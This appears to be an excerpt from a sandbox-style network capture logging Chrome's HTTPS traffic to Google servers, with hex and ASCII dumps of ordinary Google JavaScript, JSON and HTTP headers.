2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 75 30 30 33 64 5c 22 68 74 74 70 73 3a 2f 2f 6c 61 62 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 61 72 63 68 3f 73 6f 75 72 63 65 5c 75 30 30 33 64 6e 74 70 5c 22 20 74 61 72 67 65 74 5c 75 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 Data Ascii: u003d\"https://labs.google.com/search?source\u003dntp\" target\u003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u00
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e Data Ascii: 2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 7d 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 5b 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 30 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 35 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 Data Ascii: },"left_product_control_placeholder_label":["left_product_control-label0","left_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700305,3701384],"is_backup_bar":fa
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 4c 64 3b 5f 2e 4a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 Data Ascii: tion(e)}\ntry{\n/\n\n Copyright Google LLC\n SPDX-License-Identifier: Apache-2.0\n/\nvar Ld;_.Jd\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a
2024-11-15 13:09:15 UTC	585	IN	Data Raw: 32 36 5c 75 30 30 32 36 28 57 64 5c 75 30 30 33 64 56 64 28 29 29 3b 72 65 74 75 72 6e 20 57 64 7d 3b 5c 6e 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 58 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 59 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 59 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e Data Ascii: 26\u0026(Wd\u003dVd());return Wd};\n_.Zd\u003dfunction(a){const b\u003d_.Xd();return new _.Yd(b?b.createScriptURL(a):a)};_.$d\u003dfunction(a){if(a instanceof _.Yd)return a.i;throw Error(\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfun
2024-11-15 13:09:15 UTC	504	IN	Data Raw: 31 66 31 0d 0a 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 65 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 50 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 66 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 75 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 67 65 5c 75 30 30 33 64 66 75 Data Ascii: 1f1ute(\"nonce\")\|\|\"\"};\n_.ee\u003dfunction(a){var b\u003d_.Pa(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.fe\u003dfunction(a,b,c){return _.ub(a,b,c,!1)!\u003d\u003dvoid 0};_.ge\u003dfu
2024-11-15 13:09:15 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 29 5c 75 30 30 33 64 5c 75 30 30 33 64 30 7d 3b 55 64 5c 75 30 30 33 64 5f 2e 4d 64 3b 5f 2e 59 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 61 65 5c 75 30 30 33 64 2f 5e 5c 5c 73 2a 28 3f 21 6a 61 76 61 73 63 72 69 70 74 3a 29 28 3f 3a 5b 5c 5c 77 2b 2e 2d 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 6f 65 2c 73 65 2c 6b 65 3b 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 6b 65 28 5f 2e 6c 65 28 61 29 29 3a 69 65 7c 7c 28 69 65 5c 75 30 30 33 64 6e 65 77 20 Data Ascii: 8000)\u003d\u003d0};Ud\u003d_.Md;_.Yd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};ae\u003d/^\\s(?!javascript:)(?:[\\w+.-]+:\|[^:/?#](?:[/?#]\|$))/i;var oe,se,ke;_.me\u003dfunction(a){return a?new ke(_.le(a)):ie\|\|(ie\u003dnew

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	142.250.185.68	443	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:15 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-15 13:09:15 UTC	933	IN	HTTP/1.1 200 OK Version: 695623535 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 15 Nov 2024 13:09:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-15 13:09:15 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-15 13:09:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	142.250.185.78	443	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:18 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-15 13:09:18 UTC	915	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 14 Nov 2024 21:42:20 GMT Expires: Fri, 14 Nov 2025 21:42:20 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 55618 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-15 13:09:18 UTC	463	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 Data Ascii: totype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)retu
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 73 Data Ascii: ar b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.as
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 74 Data Ascii: function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),reject
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e 63 Data Ascii: promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=func
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 6f Data Ascii: or("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));fo
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 Data Ascii: r h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return t
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 73 Data Ascii: e=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();this
2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 72 Data Ascii: pe.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)r
